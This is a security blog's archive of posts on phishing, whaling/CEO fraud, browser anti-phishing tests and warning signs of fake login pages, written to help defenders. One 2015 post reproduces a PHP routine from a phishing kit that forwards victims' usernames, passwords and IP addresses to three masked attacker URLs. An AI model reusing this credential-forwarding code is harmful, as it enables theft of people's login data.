Tag Archives: Phishing

German firms lost millions of euros in ‘CEO Fraud’ scam: BSI

23 July 2017

The report ‘German firms lost millions of euros in ‘CEO Fraud’ scam: BSI’ published in the Reuters Technology News on 10 July 2017 makes me really worry. Whaling, a special form of spear phishing aimed on corporate executives, is not new at all. For some samples see this slide show on CIO.com.

It appears to me that in Germany the first line of defense, the employees, are not adequately prepared in the detection and the correct handling of phishing attacks, even though anti-phishing training is the most effective and cost efficient defensive measure in the fight against all kinds of phishing.

In addition, some rules are helpful and should be communicated to all employees:

  1. Users should never act on a business request from a company executive if the email is not signed with a company owned and valid email certificate.
  2. Users should never trust an email of a business partner if it is not signed with the partners valid email certificate.

Technical implementation is very easy, thus even SMB can use email signing in daily communication.

Have a great week.

Whaling emerges as major cybersecurity threat

3 December 2016

Whaling is a type of cyber fraud that targets mainly corporate executives. It is very closely related with phishing, thus not new. For a superb collection of examples see this slide show published on CIO.com.

As always, the combination of People, Process and Technology measures (PPT approach) is the best way to combat whaling:

People. The most effective way to deal with whaling is security awareness training. Include some whaling attacks in your anti-phishing training to raise awareness.

Processes. Enhance your information handling policy (IHP) or office manual. Add rules for the compliant handling of business requests by email:

  1. Users should never act on a business request from a company executive if the email is not signed with a company owned and valid email certificate.
  2. Never trust an email of a business partner when it is not signed with the partners valid email certificate.

Communicate the IHP to all users and train them in use and handling of email certificates.

Technology. Configure your email system such that all mails to external partners and at least all emails from company executives are signed with a valid email certificate.

With this, the risk of getting the victim of a whaling attack is greatly reduced.

Have a good weekend.

NSS Labs Tests Leading Web Browsers for Secure End User Experience

6 November 2016

On November 1, 2016 NSS Labs published the 2016 Web Browser Security Comparative Test Report.  Two tests with the most popular browsers (Google Chrome Version 53.0.2785, Microsoft Edge Version 38.14393.0.0 and Mozilla Firefox Version 48.0.2) had been run to check how effective they deal with socially engineered malware (SEM) and phishing attacks. The results are of interest for end-users because the inbuilt browser features were evaluated in the test.

When it comes to protection against phishing attacks the time needed until a URL is blocked is important. Microsoft Edge is the browser of choice, followed by Firefox and Chrome.

In the second test the protection against Socially Engineered Malware was evaluated. Again, the average time to block the malware is of great importance, and again, Microsoft Edge is the browser of choice, followed by Chrome and Firefox. The average time to block is 0.16 hours for Microsoft Edge, 2.66 hours for Chrome and 3.76 hours for Firefox.

Happy reading, and have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

Phishing mail viewed in Windows Phone app

Windows Phone Mail App View

When viewed with mail apps on smartphones or tablets this well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client the sender information in the header makes it crystal clear that this email is a phishing attempt:

Phishing mail viewed in Outlook

Phishing mail viewed in Outlook

In my opinion most of the phishing attacks are easy to detect if email apps would offer the option to display at least the full <From> tag from the email header.

It’s hard to understand why Google, Apple and Microsoft make their customer’s life more difficult than necessary.

Have a good weekend!

Firefox Browser Console provides valuable hints on Phishing Sites

11 July 2015

When a serious company requests login data the network connection is always secured. Clear indicator of a secured network connection is that the URL starts with the https protocol. In addition, the certificate information besides the URL provides reliable information about the company and the site which runs the service.

Secure Connection Indicators

Secure Connection Indicators

The missing https protocol and certificate information in phishing URLs like http://videoservicesmiami.com/bolu/HOTMAILFILES/HOTMAILFILES/login.srf.htm is a clear indicator that someone tries to trick you.

Firefox Browser Console is a useful little helper in identifying phishing sites. Programmers use an input box of type password when they ask for a password. With this the Firefox programmers defined a simple rule:

Password fields present on an insecure (http://) page are a security risk.

When Firefox loads a phishing site the code on the site is inspected. Firefox detects an input box of type password and outputs a warning on the Browser Console because the network connection is not secured:

Firefox Browser Console Security Warning

Firefox Browser Console Security Warning. Click to enlarge.

I would appreciate it if the Firefox programmers would warn the users with a message box of such security risks, and block loading of such sites. This would be a great step forward because malicious URLs are often difficult to recognize in emails.

Take care!

Nomination for the “Most-Slanting-Phishing-Site-of-the-Year” award

10 July 2015

I am receiving about 20 phishing mails a week. Most attackers invest a lot of effort in their counterfeits but, sometimes they overshoot the mark. My July candidate for the Most-Slanting-Phishing-Site-of-the-Year award is:

Most-Slanting-Phishing-Site-of-the-Year award  - July 2015 candidate

Most-Slanting-Phishing-Site-of-the-Year award – July 2015 candidate

Earlier this week the Italian company Hacking Team was hacked. The attackers made more than 400GB of confidential company data available to the public. The leaked data included tools and exploits provided by the company to carry out attacks, among them a new Flash Player zero day affecting Flash Player up to version 18.0.0.194.

Two critical vulnerabilities in as many weeks, that’s really annoying. The problem with the latest Flash Player attacks is that the payload is hidden in Flash Player SWF files. Thus, basically every SWF file might carry a malicious payload…

… It’s definitely time to solve the Flash Player problems once and for all.

Have a good weekend.